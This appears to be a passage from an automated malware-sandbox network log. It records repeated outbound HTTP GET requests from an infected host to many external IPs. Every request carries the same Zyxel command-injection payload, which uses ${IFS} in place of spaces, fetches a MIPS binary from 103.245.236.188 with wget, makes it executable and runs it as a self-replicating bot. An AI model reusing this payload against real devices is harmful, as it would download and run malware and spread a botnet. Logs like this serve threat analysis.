                                                Jan 12, 2024 18:16:20.393703938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3875192.168.2.2360084151.237.199.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393727064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3876192.168.2.2359634147.130.213.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393767118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3877192.168.2.23344702.203.87.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393798113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3878192.168.2.2351688222.31.99.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393845081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3879192.168.2.234396294.143.35.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393894911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3880192.168.2.2356492135.80.77.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393923998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3881192.168.2.233453693.12.85.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.393958092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3882192.168.2.2342688205.195.96.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394021988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3883192.168.2.2353326133.198.142.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394062042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3884192.168.2.2340200116.102.99.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394103050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3885192.168.2.2345846195.240.119.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394140005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3886192.168.2.235422685.237.246.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394166946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3887192.168.2.2348540120.88.47.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394206047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3888192.168.2.2353634142.162.178.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394258976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3889192.168.2.2340488185.49.94.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394287109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3890192.168.2.235261631.90.36.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394324064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3891192.168.2.2353384185.199.105.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394362926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3892192.168.2.2360646201.119.110.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394407988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3893192.168.2.233423496.197.189.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.394433975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3894192.168.2.234635825.236.184.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.395848036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3895192.168.2.234780418.67.231.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.397696018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3896192.168.2.2344690118.175.112.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.397696018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3897192.168.2.234056051.195.128.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.398047924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3898192.168.2.2352870191.111.202.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.398104906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3899192.168.2.2339640106.104.11.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:20.398138046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3900192.168.2.2341502156.186.220.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403196096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3901192.168.2.234405291.149.221.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403243065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3902192.168.2.233813840.152.110.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403280973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3903192.168.2.2335670105.48.82.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403322935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3904192.168.2.234554866.52.93.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403373003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3905192.168.2.2335280204.88.39.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403399944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3906192.168.2.235349276.110.56.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403449059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3907192.168.2.234789645.12.148.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403476954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3908192.168.2.235832623.5.163.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403500080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3909192.168.2.233681886.240.1.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403552055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3910192.168.2.2360102210.241.224.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403584003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3911192.168.2.235908251.155.157.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403635025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3912192.168.2.235404262.79.110.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403685093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3913192.168.2.2354894213.127.195.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403702021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3914192.168.2.2335120197.61.53.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403743029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3915192.168.2.2347722108.123.178.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403790951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3916192.168.2.235864864.228.204.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403842926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3917192.168.2.2336038114.154.167.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403876066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3918192.168.2.2345438217.226.255.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403928041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3919192.168.2.233920835.199.46.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403966904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3920192.168.2.235515438.77.146.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.403997898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3921192.168.2.235703834.51.154.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404048920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3922192.168.2.2350312217.138.238.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404074907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3923192.168.2.2355214154.123.48.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404122114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3924192.168.2.2355876197.28.138.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404150963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3925192.168.2.2354908208.65.117.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404181957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3926192.168.2.2339880152.132.230.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404242039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3927192.168.2.2333432110.105.162.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404270887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3928192.168.2.2352334187.159.62.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404300928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3929192.168.2.2355544192.80.164.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404376030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3930192.168.2.2341926119.66.252.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404409885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3931192.168.2.233716892.29.118.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404434919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3932192.168.2.23489144.112.158.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404473066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3933192.168.2.2341644118.147.65.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404510021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3934192.168.2.2347894208.131.75.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404551029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3935192.168.2.2357024206.91.0.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404571056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3936192.168.2.233927495.140.6.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.404613018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3937192.168.2.2333854175.176.38.233443
                                                TimestampBytes transferredDirectionData
